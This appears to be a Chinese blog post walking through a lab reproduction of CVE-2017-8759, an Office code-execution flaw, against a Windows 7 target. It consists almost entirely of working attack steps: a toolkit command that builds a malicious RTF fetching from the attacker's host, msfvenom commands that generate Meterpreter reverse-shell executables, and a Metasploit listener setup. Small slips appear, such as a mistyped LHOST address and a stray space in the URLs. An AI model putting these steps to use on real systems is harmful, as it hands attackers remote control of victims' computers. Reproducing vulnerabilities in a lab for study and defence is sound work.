CVE-2017-8759 offcie代码执行漏洞复现

攻击机:192.168.0.109,kali
靶机:192.168.0.120 ,win7,office 2010
exp:  CVE-2017-8759-masterPython version 2.7.13

一、生成恶意rtf或者ppsx文件

python cve-2017-8759_toolkit.py -M gen -w 12.rtf -u http:// 192.168.0.109/logo.txt

二、生成反弹shell的exp文件

还在解压目录执行

32位执行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=6666 -f exe > shell.exe

64位执行如下命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=6666 -f exe > shell.exe

三、监听来自ppsx会话执行反弹shell

python cve-2017-8759_toolkit.py -M exp -e http:// 192.168.0.109/shell.exe -l /tmp/shell.exe

另开一个msf窗口执行监听

~ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 92.168.0.109
msf > set LPORT 6666
msf > set PAYLOAD windows/meterpreter/reverse_tcp  
如果是64位则为:set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

四、在靶机上运行12.rtf文件,成功反弹shell

发表评论

电子邮件地址不会被公开。 必填项已用*标注